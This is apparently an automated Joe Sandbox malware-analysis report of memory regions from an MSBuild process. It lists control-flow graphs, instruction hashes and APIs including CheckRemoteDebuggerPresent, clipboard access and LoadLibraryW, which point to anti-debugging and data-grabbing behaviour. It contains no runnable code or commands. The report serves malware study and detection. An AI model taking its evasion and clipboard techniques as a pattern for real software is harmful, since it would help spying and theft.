                                                                                                                                                      control_flow_graph 614 5e27d18-5e27e71 call 5e29fe0 1213 5e27e74 call 5e2a650 614->1213 1214 5e27e74 call 5e2a5b8 614->1214 644 5e27e7a-5e27ee2 1215 5e27ee5 call 5e2a8f1 644->1215 1216 5e27ee5 call 5e2a848 644->1216 654 5e27eeb-5e28faa call 5e2af3b call 5e2bad1 call 5e2bcf8 call 5e2c1f1 1220 5e28fb0 call 6110139 654->1220 1221 5e28fb0 call 6110148 654->1221 930 5e28fb6-5e2911f 1211 5e29125 call 6110b01 930->1211 1212 5e29125 call 6110b10 930->1212 953 5e2912b-5e29289 1218 5e2928f call 6110f58 953->1218 1219 5e2928f call 6110f4b 953->1219 976 5e29295-5e29872 1208 5e29878 call 6111e50 976->1208 1209 5e29878 call 6111e40 976->1209 1076 5e2987e-5e29c6e 1147 5e29c7a-5e29fce 1076->1147 1208->1076 1209->1076 1211->953 1212->953 1213->644 1214->644 1215->654 1216->654 1218->976 1219->976 1220->930 1221->930
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000007.00000002.2147158571.0000000005E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E20000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_7_2_5e20000_MSBuild.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID: LR^q$LR^q$LR^q$LR^q$LR^q$LR^q$LR^q$LR^q$LR^q$LR^q$LR^q$LR^q$LR^q$LR^q$LR^q$LR^q$LR^q$LR^q$LR^q$LR^q$LR^q
                                                                                                                                                      • API String ID: 0-3940867653
                                                                                                                                                      • Opcode ID: 7a89ad0f1c8dd2ae26864384bf60e3d08004e832452616e83608195c1f2816c2
                                                                                                                                                      • Instruction ID: 3f92a5835c441441abe2ee0da1ed3da8c01d8431960d33518c7d7463def31bb1
                                                                                                                                                      • Opcode Fuzzy Hash: 7a89ad0f1c8dd2ae26864384bf60e3d08004e832452616e83608195c1f2816c2
                                                                                                                                                      • Instruction Fuzzy Hash: E423BFB4D143299FCB659F64DD48A9DBBB2BF48302F1045E9E50AA7220DB359E91CF40

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      • Executed
                                                                                                                                                      • Not Executed
                                                                                                                                                      control_flow_graph 1224 5e27aa8-5e280df 1230 5e280e4-5e280ea call 5e2af3b 1224->1230 1231 5e280f0-5e282db 1230->1231 1263 5e282e6 1231->1263 1264 5e282f2-5e283c4 1263->1264 1278 5e283d0 1264->1278 1279 5e283dc-5e2844f 1278->1279 1286 5e2845a-5e28466 call 5e2bad1 1279->1286 1288 5e28472-5e28527 1286->1288 1299 5e2852c-5e28538 call 5e2bcf8 1288->1299 1301 5e28544-5e285b9 1299->1301 1309 5e285c4 1301->1309 1310 5e285d0-5e28691 1309->1310 1322 5e28696-5e2869c call 5e2c1f1 1310->1322 1323 5e286a2-5e2892f 1322->1323 1365 5e28935-5e28941 1323->1365 1366 5e2894c-5e28e35 1365->1366 1447 5e28e40 1366->1447 1448 5e28e4c-5e28f9f 1447->1448 1470 5e28faa 1448->1470 1753 5e28fb0 call 6110139 1470->1753 1754 5e28fb0 call 6110148 1470->1754 1471 5e28fb6-5e28fc2 1473 5e28fce-5e2907c 1471->1473 1484 5e29088 1473->1484 1485 5e29094-5e29114 1484->1485 1493 5e2911f 1485->1493 1751 5e29125 call 6110b01 1493->1751 1752 5e29125 call 6110b10 1493->1752 1494 5e2912b-5e29143 1497 5e2914f 1494->1497 1498 5e2915b-5e291b6 1497->1498 1503 5e291bc-5e291c8 1498->1503 1504 5e291d3-5e291f1 1503->1504 1507 5e291fd-5e29209 1504->1507 1509 5e29215-5e2927e 1507->1509 1516 5e29289 1509->1516 1757 5e2928f call 6110f58 1516->1757 1758 5e2928f call 6110f4b 1516->1758 1517 5e29295-5e2935b 1530 5e29367 1517->1530 1531 5e29373-5e2986d 1530->1531 1616 5e29872 1531->1616 1748 5e29878 call 6111e50 1616->1748 1749 5e29878 call 6111e40 1616->1749 1617 5e2987e-5e29c20 1683 5e29c2c 1617->1683 1684 5e29c38-5e29c50 1683->1684 1687 5e29c5c-5e29c6e 1684->1687 1688 5e29c7a-5e29fce 1687->1688 1748->1617 1749->1617 1751->1494 1752->1494 1753->1471 1754->1471 1757->1517 1758->1517
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000007.00000002.2147158571.0000000005E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E20000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_7_2_5e20000_MSBuild.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID: LR^q$LR^q$LR^q$LR^q$LR^q$LR^q$LR^q$LR^q$LR^q$LR^q$LR^q$LR^q$LR^q$LR^q$LR^q$LR^q$LR^q$LR^q$LR^q$LR^q$LR^q
                                                                                                                                                      • API String ID: 0-3940867653
                                                                                                                                                      • Opcode ID: 1c9483d97a41c60f34de22312a6e4c02ed07303cbbb4baad2e70cd271ad48b27
                                                                                                                                                      • Instruction ID: 705c873e49a23122a8fb40d3ae6f6bb02aacd1b9dc4e0ea33e1a82f07676156c
                                                                                                                                                      • Opcode Fuzzy Hash: 1c9483d97a41c60f34de22312a6e4c02ed07303cbbb4baad2e70cd271ad48b27
                                                                                                                                                      • Instruction Fuzzy Hash: 9A03CFB4D103298FCB659F64DD88A9DBBB2FF48301F1045E9E90AA7260DB359E95CF40

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      • Executed
                                                                                                                                                      • Not Executed
                                                                                                                                                      control_flow_graph 2369 314f4c4-314f55c 2372 314f5a6-314f5a8 2369->2372 2373 314f55e-314f569 2369->2373 2374 314f5aa-314f5c2 2372->2374 2373->2372 2375 314f56b-314f577 2373->2375 2382 314f5c4-314f5cf 2374->2382 2383 314f60c-314f60e 2374->2383 2376 314f579-314f583 2375->2376 2377 314f59a-314f5a4 2375->2377 2379 314f585 2376->2379 2380 314f587-314f596 2376->2380 2377->2374 2379->2380 2380->2380 2381 314f598 2380->2381 2381->2377 2382->2383 2384 314f5d1-314f5dd 2382->2384 2385 314f610-314f622 2383->2385 2386 314f600-314f60a 2384->2386 2387 314f5df-314f5e9 2384->2387 2392 314f629-314f655 2385->2392 2386->2385 2389 314f5ed-314f5fc 2387->2389 2390 314f5eb 2387->2390 2389->2389 2391 314f5fe 2389->2391 2390->2389 2391->2386 2393 314f65b-314f669 2392->2393 2394 314f672-314f6cf 2393->2394 2395 314f66b-314f671 2393->2395 2402 314f6d1-314f6d5 2394->2402 2403 314f6df-314f6e3 2394->2403 2395->2394 2402->2403 2406 314f6d7-314f6da call 3141054 2402->2406 2404 314f6e5-314f6e9 2403->2404 2405 314f6f3-314f6f7 2403->2405 2404->2405 2408 314f6eb-314f6ee call 3141054 2404->2408 2409 314f707-314f70b 2405->2409 2410 314f6f9-314f6fd 2405->2410 2406->2403 2408->2405 2413 314f70d-314f711 2409->2413 2414 314f71b 2409->2414 2410->2409 2412 314f6ff 2410->2412 2412->2409 2413->2414 2415 314f713 2413->2415 2416 314f71c 2414->2416 2415->2414 2416->2416
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000007.00000002.2116551885.0000000003140000.00000040.00000800.00020000.00000000.sdmp, Offset: 03140000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_7_2_3140000_MSBuild.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID: \VTm$\VTm
                                                                                                                                                      • API String ID: 0-2997445572
                                                                                                                                                      • Opcode ID: 1322c6c02c05772b57079ad533ad91080f559dedbbdfb57f65b58b28fa47274b
                                                                                                                                                      • Instruction ID: 6f34bacca177ed79b5e7e86b7ee2116a35fefe0638f134237e5239e38f3d060b
                                                                                                                                                      • Opcode Fuzzy Hash: 1322c6c02c05772b57079ad533ad91080f559dedbbdfb57f65b58b28fa47274b
                                                                                                                                                      • Instruction Fuzzy Hash: FA713AB0E00259DFDF14CFA9D98579DBBF2AF88314F188129E414AB364EB749846CF91

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      • Executed
                                                                                                                                                      • Not Executed
                                                                                                                                                      control_flow_graph 2417 314f4d0-314f55c 2420 314f5a6-314f5a8 2417->2420 2421 314f55e-314f569 2417->2421 2422 314f5aa-314f5c2 2420->2422 2421->2420 2423 314f56b-314f577 2421->2423 2430 314f5c4-314f5cf 2422->2430 2431 314f60c-314f60e 2422->2431 2424 314f579-314f583 2423->2424 2425 314f59a-314f5a4 2423->2425 2427 314f585 2424->2427 2428 314f587-314f596 2424->2428 2425->2422 2427->2428 2428->2428 2429 314f598 2428->2429 2429->2425 2430->2431 2432 314f5d1-314f5dd 2430->2432 2433 314f610-314f655 2431->2433 2434 314f600-314f60a 2432->2434 2435 314f5df-314f5e9 2432->2435 2441 314f65b-314f669 2433->2441 2434->2433 2437 314f5ed-314f5fc 2435->2437 2438 314f5eb 2435->2438 2437->2437 2439 314f5fe 2437->2439 2438->2437 2439->2434 2442 314f672-314f6cf 2441->2442 2443 314f66b-314f671 2441->2443 2450 314f6d1-314f6d5 2442->2450 2451 314f6df-314f6e3 2442->2451 2443->2442 2450->2451 2454 314f6d7-314f6da call 3141054 2450->2454 2452 314f6e5-314f6e9 2451->2452 2453 314f6f3-314f6f7 2451->2453 2452->2453 2456 314f6eb-314f6ee call 3141054 2452->2456 2457 314f707-314f70b 2453->2457 2458 314f6f9-314f6fd 2453->2458 2454->2451 2456->2453 2461 314f70d-314f711 2457->2461 2462 314f71b 2457->2462 2458->2457 2460 314f6ff 2458->2460 2460->2457 2461->2462 2463 314f713 2461->2463 2464 314f71c 2462->2464 2463->2462 2464->2464
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000007.00000002.2116551885.0000000003140000.00000040.00000800.00020000.00000000.sdmp, Offset: 03140000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_7_2_3140000_MSBuild.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID: \VTm$\VTm
                                                                                                                                                      • API String ID: 0-2997445572
                                                                                                                                                      • Opcode ID: 55646b221f73e95093d205ae9ea7c0be73e59b5cceb7718f2918f58edf763a06
                                                                                                                                                      • Instruction ID: b03ba73e67124cf39c416904bfbc8d0dee58dcf224137c2ccd7cdc55d2890698
                                                                                                                                                      • Opcode Fuzzy Hash: 55646b221f73e95093d205ae9ea7c0be73e59b5cceb7718f2918f58edf763a06
                                                                                                                                                      • Instruction Fuzzy Hash: BA713CB0E002499FDF14CFA9D98579EBBF2AF88314F188129E415AB354EB749846CB91

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      • Executed
                                                                                                                                                      • Not Executed
                                                                                                                                                      control_flow_graph 2525 5ccc920-5ccc92f 2526 5ccc935-5ccc937 2525->2526 2527 5ccc9b3-5ccc9d8 2525->2527 2528 5ccc93d-5ccc941 2526->2528 2529 5ccc9df-5ccca0c 2526->2529 2527->2529 2530 5ccc947-5ccc94f 2528->2530 2531 5ccca13-5ccca40 2528->2531 2529->2531 2533 5ccc955-5ccc960 call 5ccc2dc 2530->2533 2534 5ccca47-5ccca8a 2530->2534 2531->2534 2542 5ccc969-5ccc96d 2533->2542 2543 5ccc962-5ccc966 2533->2543 2558 5ccca8c-5ccca8f 2534->2558 2559 5ccca90-5cccada 2534->2559 2548 5ccc96f-5ccc978 2542->2548 2549 5ccc983-5ccc98e 2542->2549 2554 5ccc980 2548->2554 2551 5ccc994-5ccc9b0 2549->2551 2554->2549
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000007.00000002.2145821926.0000000005CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CC0000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_7_2_5cc0000_MSBuild.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID: (bq$Hbq
                                                                                                                                                      • API String ID: 0-4081012451
                                                                                                                                                      • Opcode ID: 68f5e795423bf6115b0db363596e655d53fd973f90436b7ca363f09853c31e28
                                                                                                                                                      • Instruction ID: abd5e88544b82564919e83b2f739e1b685e9e614c32f1034692dce434a040112
                                                                                                                                                      • Opcode Fuzzy Hash: 68f5e795423bf6115b0db363596e655d53fd973f90436b7ca363f09853c31e28
                                                                                                                                                      • Instruction Fuzzy Hash: DC41CF31B082449FC715AF78D45466EBFE6BF99310F1445AAE846CB391CE349D0ACB91

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      • Executed
                                                                                                                                                      • Not Executed
                                                                                                                                                      control_flow_graph 2641 5ccdf09-5ccdf33 2642 5ccdf35-5ccdf37 2641->2642 2643 5ccdf3e-5ccdf41 2642->2643 2644 5ccdf39 2642->2644 2643->2642 2645 5ccdf43-5cce2e3 2643->2645 2644->2643 2731 5cce2ef-5ccf27b 2645->2731
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000007.00000002.2145821926.0000000005CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CC0000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_7_2_5cc0000_MSBuild.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID: LR^q
                                                                                                                                                      • API String ID: 0-2625958711
                                                                                                                                                      • Opcode ID: 3e2ccbae62731848bcacefd2058e8f614716bba732302ed39f13834249027517
                                                                                                                                                      • Instruction ID: b6128fe02288688d6ad1083b4f469b75e979262133d3660f203de76fbdf81c12
                                                                                                                                                      • Opcode Fuzzy Hash: 3e2ccbae62731848bcacefd2058e8f614716bba732302ed39f13834249027517
                                                                                                                                                      • Instruction Fuzzy Hash: C0C2B474E002299FCF65AFB4D858A9EBBB6BF48301F5049E9E409A7314DB349E81CF51
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000007.00000002.2149642682.0000000005F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05F70000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_7_2_5f70000_MSBuild.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID: d
                                                                                                                                                      • API String ID: 0-2564639436
                                                                                                                                                      • Opcode ID: 872ee7b531a438495ea1162206f5dbe876fa7234376350725fb131777564bb1c
                                                                                                                                                      • Instruction ID: c923baba8480743ff4a1aee370842534809d5859a0ba981ba73c532886c4a6cf
                                                                                                                                                      • Opcode Fuzzy Hash: 872ee7b531a438495ea1162206f5dbe876fa7234376350725fb131777564bb1c
                                                                                                                                                      • Instruction Fuzzy Hash: D6623870E002099FDB24CF68C884BADBBB2FF4A304F148666E419D7655E778E995CF81

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      • Executed
                                                                                                                                                      • Not Executed
                                                                                                                                                      control_flow_graph 4714 5f7a310-5f7a32b 4715 5f7a32d-5f7a330 4714->4715 4716 5f7a332-5f7a337 4715->4716 4717 5f7a33a-5f7a33d 4715->4717 4716->4717 4718 5f7a33f call 5f7ad93 4717->4718 4719 5f7a34d-5f7a350 4717->4719 4724 5f7a345-5f7a348 4718->4724 4720 5f7a356-5f7a359 4719->4720 4721 5f7ad6d-5f7ad76 4719->4721 4725 5f7a35b-5f7a362 4720->4725 4726 5f7a379-5f7a37c 4720->4726 4722 5f7a3a1-5f7a3aa 4721->4722 4723 5f7ad7c-5f7ad83 4721->4723 4727 5f7ad84-5f7ad91 4722->4727 4728 5f7a3b0-5f7a3b7 4722->4728 4724->4719 4725->4727 4729 5f7a368-5f7a372 4725->4729 4730 5f7a37e-5f7a385 4726->4730 4731 5f7a39c-5f7a39f 4726->4731 4733 5f7a3bc-5f7a3bf 4728->4733 4739 5f7a3ce-5f7a3d4 4729->4739 4741 5f7a374 4729->4741 4730->4727 4732 5f7a38b-5f7a395 4730->4732 4731->4722 4731->4733 4732->4739 4742 5f7a397 4732->4742 4735 5f7a3c1-5f7a3c8 4733->4735 4736 5f7a3c9-5f7a3cc 4733->4736 4736->4739 4740 5f7a3d9-5f7a3db 4736->4740 4739->4740 4743 5f7a3e2-5f7a3e5 4740->4743 4744 5f7a3dd 4740->4744 4741->4726 4742->4731 4743->4715 4745 5f7a3eb-5f7a3fa 4743->4745 4744->4743 4747 5f7a400-5f7a4c4 4745->4747 4748 5f7ad6a 4745->4748 4765 5f7ad1c-5f7ad48 4747->4765 4766 5f7a4ca-5f7a4d8 4747->4766 4748->4721 4776 5f7ad53 4765->4776 4777 5f7ad4a 4765->4777 4769 5f7a4f0-5f7a4f4 4766->4769 4770 5f7a4da-5f7a4e0 4766->4770 4774 5f7a4f6-5f7a4fe 4769->4774 4775 5f7a503-5f7a572 4769->4775 4772 5f7a4e4-5f7a4e6 4770->4772 4773 5f7a4e2 4770->4773 4772->4769 4773->4769 4778 5f7a58e-5f7a59e 4774->4778 4803 5f7a574-5f7a57c 4775->4803 4804 5f7a57e-5f7a588 4775->4804 4776->4748 4777->4776 4779 5f7a5a4-5f7a6f2 4778->4779 4780 5f7ad08-5f7ad16 4778->4780 4819 5f7a6f4-5f7a718 4779->4819 4820 5f7a71a-5f7a73e 4779->4820 4780->4765 4780->4766 4803->4778 4804->4778 4821 5f7a744-5f7a895 4819->4821 4820->4821 4846 5f7a897-5f7a8bb 4821->4846 4847 5f7a8bd-5f7a8e3 4821->4847 4848 5f7a8e9-5f7aa2b 4846->4848 4847->4848 4875 5f7aa43-5f7aa5d 4848->4875 4876 5f7aa2d-5f7aa41 4848->4876 4877 5f7aa63-5f7ad02 4875->4877 4876->4877 4877->4780
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000007.00000002.2149642682.0000000005F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05F70000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_7_2_5f70000_MSBuild.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID: PH^q
                                                                                                                                                      • API String ID: 0-2549759414
                                                                                                                                                      • Opcode ID: 0c49c13d47abb656c24a16b4b2abbb0a5781aca27f9c217ad8ff37352400f738
                                                                                                                                                      • Instruction ID: c6a18e85f262aec6c189f446ac49c344a1ee3002520222a6b981d1ed82d8225f
                                                                                                                                                      • Opcode Fuzzy Hash: 0c49c13d47abb656c24a16b4b2abbb0a5781aca27f9c217ad8ff37352400f738
                                                                                                                                                      • Instruction Fuzzy Hash: 0752E474E142189FDB54DFB4D848A9DBBB6BF48301F1088AAE90AE7324DB359D95CF40
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000007.00000002.2149642682.0000000005F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05F70000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_7_2_5f70000_MSBuild.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID: d
                                                                                                                                                      • API String ID: 0-2564639436
                                                                                                                                                      • Opcode ID: c2fe8a4eabfb6f4978a731c4dc204e21c77df5564b614eb5828d85f96e29e61c
                                                                                                                                                      • Instruction ID: 2d3d509ba2cfeca7e6b06f51778d86aea2aad1249466290f03479ce836e21b0f
                                                                                                                                                      • Opcode Fuzzy Hash: c2fe8a4eabfb6f4978a731c4dc204e21c77df5564b614eb5828d85f96e29e61c
                                                                                                                                                      • Instruction Fuzzy Hash: C0F11835A005098FDB14CF98C984AADBBF6FF88304F59C666D419EB265DB34EC46CB84
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000007.00000002.2147158571.0000000005E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E20000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_7_2_5e20000_MSBuild.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID: E>p
                                                                                                                                                      • API String ID: 0-1288578076
                                                                                                                                                      • Opcode ID: fc6037ee79b2ac9e98591c776658af865be431f61a77315b40f3b9aadc99db0e
                                                                                                                                                      • Instruction ID: a65a36756870ee006fc111fdb08cb23f30514cd10b2bb285a6d306f6044a0e1f
                                                                                                                                                      • Opcode Fuzzy Hash: fc6037ee79b2ac9e98591c776658af865be431f61a77315b40f3b9aadc99db0e
                                                                                                                                                      • Instruction Fuzzy Hash: 1DE11734A043158FDB14DFB5D448A6EBBB6BF88304F248969E806AB355EF359D42CF40
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000007.00000002.2116551885.0000000003140000.00000040.00000800.00020000.00000000.sdmp, Offset: 03140000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_7_2_3140000_MSBuild.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      • Opcode ID: ae6354a0366765b09824ddb4ba63e0f7674b31b37590bffa5590bca67bdd6b84
                                                                                                                                                      • Instruction ID: 97ce06f13b824a0abd18566043903ae7c40990c41d0eadef36162570974bd51d
                                                                                                                                                      • Opcode Fuzzy Hash: ae6354a0366765b09824ddb4ba63e0f7674b31b37590bffa5590bca67bdd6b84
                                                                                                                                                      • Instruction Fuzzy Hash: E9F28075E00219DFCB64AFB4D94CA9DBBB9BF48305F1048E9E50AE7358DA358A81CF50
                                                                                                                                                      APIs
                                                                                                                                                      • CheckRemoteDebuggerPresent.KERNELBASE(?,?), ref: 059416F7
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000007.00000002.2145068648.0000000005940000.00000040.00000800.00020000.00000000.sdmp, Offset: 05940000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_7_2_5940000_MSBuild.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: CheckDebuggerPresentRemote
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 3662101638-0
                                                                                                                                                      • Opcode ID: a557b326781849734b84c9478bae3e7bf9f021712f87c38495c7f25633e9e475
                                                                                                                                                      • Instruction ID: 54c994e19fff9ba527cf5cb1653605e868d64faab2bbf5cddc93cf3a02fb49b6
                                                                                                                                                      • Opcode Fuzzy Hash: a557b326781849734b84c9478bae3e7bf9f021712f87c38495c7f25633e9e475
                                                                                                                                                      • Instruction Fuzzy Hash: A0319C718043598FCB10DFADD8847EEBFF4AF49310F14806AE484A7251D7389988CFA5
                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000007.00000002.2146982003.0000000005E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E10000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_7_2_5e10000_MSBuild.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Clipboard
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 220874293-0
                                                                                                                                                      • Opcode ID: 126ad6bedb9407305699454b4cc241529f23bf91911bb54eca772403582812ad
                                                                                                                                                      • Instruction ID: d10306e2e6e26ec1db1ef782e33050171b84edcdf9a25fd15a8ac7c98865f6a7
                                                                                                                                                      • Opcode Fuzzy Hash: 126ad6bedb9407305699454b4cc241529f23bf91911bb54eca772403582812ad
                                                                                                                                                      • Instruction Fuzzy Hash: E73123B0901248DFDB20CFA9C984BDDBBF5BF48304F248069E484AB294D7756985CF95
                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000007.00000002.2146982003.0000000005E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E10000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_7_2_5e10000_MSBuild.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Clipboard
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 220874293-0
                                                                                                                                                      • Opcode ID: 7b8241a5d96b2a2b843ebac0c2adccc8508a3ff897533d69e17b6fe87413388d
                                                                                                                                                      • Instruction ID: dd60f9fbe5c0e376c4978aa4898ccb470d28adbd8030744a50f5fe4b4bd4fcb7
                                                                                                                                                      • Opcode Fuzzy Hash: 7b8241a5d96b2a2b843ebac0c2adccc8508a3ff897533d69e17b6fe87413388d
                                                                                                                                                      • Instruction Fuzzy Hash: 3D3100B0901248DFDB10DF99C984BDDBBF5AF48304F248029E448AB290D7756985CF95
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000007.00000002.2150748429.0000000006110000.00000040.00000800.00020000.00000000.sdmp, Offset: 06110000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_7_2_6110000_MSBuild.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID: Te^q
                                                                                                                                                      • API String ID: 0-671973202
                                                                                                                                                      • Opcode ID: 56cdf5015933e5127ff08ff6f75083eb5883256167fe892e5e366642dd13a4f6
                                                                                                                                                      • Instruction ID: 6cc5f0359dd2ef43f104ae7e06d452e922ae8965df19fdca3898f0b4a1c8cc05
                                                                                                                                                      • Opcode Fuzzy Hash: 56cdf5015933e5127ff08ff6f75083eb5883256167fe892e5e366642dd13a4f6
                                                                                                                                                      • Instruction Fuzzy Hash: 8FC11634E103059FDB54DFB9D988A9EBBF6AF88711F208865E416EB394DB749C41CB80
                                                                                                                                                      APIs
                                                                                                                                                      • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,05E191DE,?,?,?,?,?), ref: 05E1929F
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000007.00000002.2146982003.0000000005E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E10000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_7_2_5e10000_MSBuild.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: DuplicateHandle
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 3793708945-0
                                                                                                                                                      • Opcode ID: 0e50e07dd19f0711d228c4c50151e52cc400964c257d02cb94d9dce65cc87b78
                                                                                                                                                      • Instruction ID: f85bbab3663c79087f1bcfdb175d7a7cf4b47c50de7262719785f36bf1e1011d
                                                                                                                                                      • Opcode Fuzzy Hash: 0e50e07dd19f0711d228c4c50151e52cc400964c257d02cb94d9dce65cc87b78
                                                                                                                                                      • Instruction Fuzzy Hash: 3221E5B59002489FDB10CF99D584ADEBBF5FB48310F14801AE955A7311D379A950CFA5
                                                                                                                                                      APIs
                                                                                                                                                      • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,05E191DE,?,?,?,?,?), ref: 05E1929F
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000007.00000002.2146982003.0000000005E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E10000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_7_2_5e10000_MSBuild.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: DuplicateHandle
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 3793708945-0
                                                                                                                                                      • Opcode ID: ca86c3143fbce7b5602fab8bc5e6ca2c3eabc53c633659229563b3fa394ed544
                                                                                                                                                      • Instruction ID: ec568bc80bf825599ec4354f9f8ab2d409827b98554d5452f906e90e2049fc87
                                                                                                                                                      • Opcode Fuzzy Hash: ca86c3143fbce7b5602fab8bc5e6ca2c3eabc53c633659229563b3fa394ed544
                                                                                                                                                      • Instruction Fuzzy Hash: 5A21E0B59002599FDB10CFA9D584AEEBBF5FB48320F14841AE958A7250C379A940CFA4
                                                                                                                                                      APIs
                                                                                                                                                      • LoadLibraryW.KERNELBASE(00000000), ref: 05DEBC2E
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000007.00000002.2146326029.0000000005DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DE0000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_7_2_5de0000_MSBuild.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: LibraryLoad
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 1029625771-0
                                                                                                                                                      • Opcode ID: 17c26ec5cabf23776f6693fd1e89c8bc818b346f6c353992ea8b245dc3da9bbd
                                                                                                                                                      • Instruction ID: f70b845c80418da77c8b7cfe64c84e2d7dec219414c493d61be0965066fbca6d
                                                                                                                                                      • Opcode Fuzzy Hash: 17c26ec5cabf23776f6693fd1e89c8bc818b346f6c353992ea8b245dc3da9bbd
